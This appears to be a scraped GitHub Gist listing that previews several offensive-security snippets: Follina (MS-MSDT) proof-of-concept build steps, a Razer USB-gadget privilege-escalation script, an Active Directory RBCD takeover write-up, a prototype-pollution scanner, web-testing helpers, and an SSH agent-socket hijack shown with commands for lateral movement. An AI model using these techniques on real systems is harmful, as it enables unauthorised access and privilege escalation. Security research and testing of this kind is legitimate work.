
lalo.pores b00ls0ck3t
@timb-machine
timb-machine / linux-malware to ATTACK.md
Last active August 23, 2022 09:57

Credential Access

T1556.003: Pluggable Authentication Modules

T1003: OS Credential Dumping

@tothi
tothi / ms-msdt.MD
Last active June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@tothi
tothi / usbgadget_razer.sh
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@R0X4R
R0X4R / protpscan.sh
Created July 5, 2021 09:45
A Prototype pollution vulnerability scanner
#!/bin/bash
targets=$1
mkdir -p protpscan
# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
# usage: subfinder -d target.com -all -silent | httpx -silent | anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
cd protpscan 2> /dev/null
echo -e "Total $(cat $targets | wc -l) domains loaded to scan"
echo -e "Increasing scope..."
xargs -a $targets -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt
cat $targets | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt &> /dev/null
@hartescout
hartescout / reference.txt
Last active March 4, 2023 00:15
macOS Internals, Reversing, and Analysis reference I've found essential.
## In no particular order. I'm pulling these from a bookmark folder, I'll work on labeling as I have time. Hope these help. Will be mixing in Linux reference as well.
Sidenote: the macOS Internals series is amazing, although it might be out of reach for some. However, if you're having a hard time deciding (I definitely was) and it's in budget, in my opinion they are worth the price. I've worked through Volume II, waiting on Volume III.
As always, most of what we need in our world can be found open-sourced and provided by some of the brightest, but it can be a frustrating journey finding material.
https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought/
http://timetobleed.com/dynamic-linking-elf-vs-mach-o/
https://github.com/apple/darwin-xnu
https://opensource.apple.com/source/xnu/
https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Architecture/Architecture.html
@fransr
fransr / logger.js
Last active July 17, 2025 13:47
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
;(getElementByIdCopy => {
  Element.prototype.getElementById = function(q) {
    logger('getElementById', q, this, this.innerHTML);
    return Reflect.apply(getElementByIdCopy, this, [q])
  }
})(Element.prototype.getElementById)
@str0my
str0my / turbointruder.py
Created February 17, 2021 13:30
@Agarri_FR challenge
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           engine=Engine.BURP,
                           pipeline=False
                           )
    for word in "0123456789abcdef":
        engine.queue(target.req, word.rstrip())
@fransr
fransr / customcsrf.py
Created February 16, 2021 08:30
Hackvertor Custom CSRF tag
import httplib
import urllib
http = httplib.HTTPSConnection('example.com', 443)
cookie = 'your=cookies';
http.request("GET", "/api/v1/csrf", "", {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'referer': 'https://example.com/',

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld